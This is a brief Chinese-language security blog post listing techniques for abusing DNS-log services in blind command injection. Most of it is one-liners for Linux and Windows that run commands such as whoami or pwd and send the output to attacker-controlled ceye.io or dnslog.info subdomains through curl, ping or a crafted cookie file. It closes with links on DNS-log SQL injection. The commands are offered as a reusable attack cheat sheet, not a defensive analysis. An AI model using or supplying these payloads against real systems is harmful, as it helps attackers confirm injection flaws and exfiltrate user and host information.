MENU

dnslog攻击的一些姿势

June 3, 2016 • Security

命令执行

linux:
curl http://ip.port.domain.ceye.io/`whoami`
ping `whoami`.ip.port.domain.ceye.io
windows:
ping %USERNAME%.domain.ceye.io

dnslog1.png

dnslog2.png

linxu

curl `whoami`.xxxxxx.dnslog.info

windows

如:whoami

获取计算机名:

for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info

获取用户名:

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info

OR

for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg

三个白帽

cloudeye说明里证明命令执行成功一般是ping、curl ccxxxx.dnslog.info域名,然后dns、apache日志会有记录,证明命令执行成功,但无回显,仔细构思,发现了一套可以通过cloudeye回显命令执行结果的思路,看下面

启动三个白帽任意linux结界:

curl -b cookie=admin ccxxxx.dnslog.info

创建cookie文件:

echo -e "ccxxxx.dnslog.info\tFALSE\t/\tFALSE\t1450450776\tusername\tadmin" > cookies.txt

执行系统命令,并将结果追加到cookies.txt中去:

pwd | tee -a cookies.txt

将回显内容变成一行:

paste -s -d ":" cookies.txt | tee cookies.txt

日志记录回显内容cookie:

curl -b cookies.txt cc6020.dnslog.info

注入

http://blog.csdn.net/niexinming/article/details/50001367
http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html
http://byd.dropsec.xyz/2016/12/04/dnslog%E5%88%A9%E7%94%A8/

Tags: dnslog
Archives QR Code
QR Code for this page
Tipping QR Code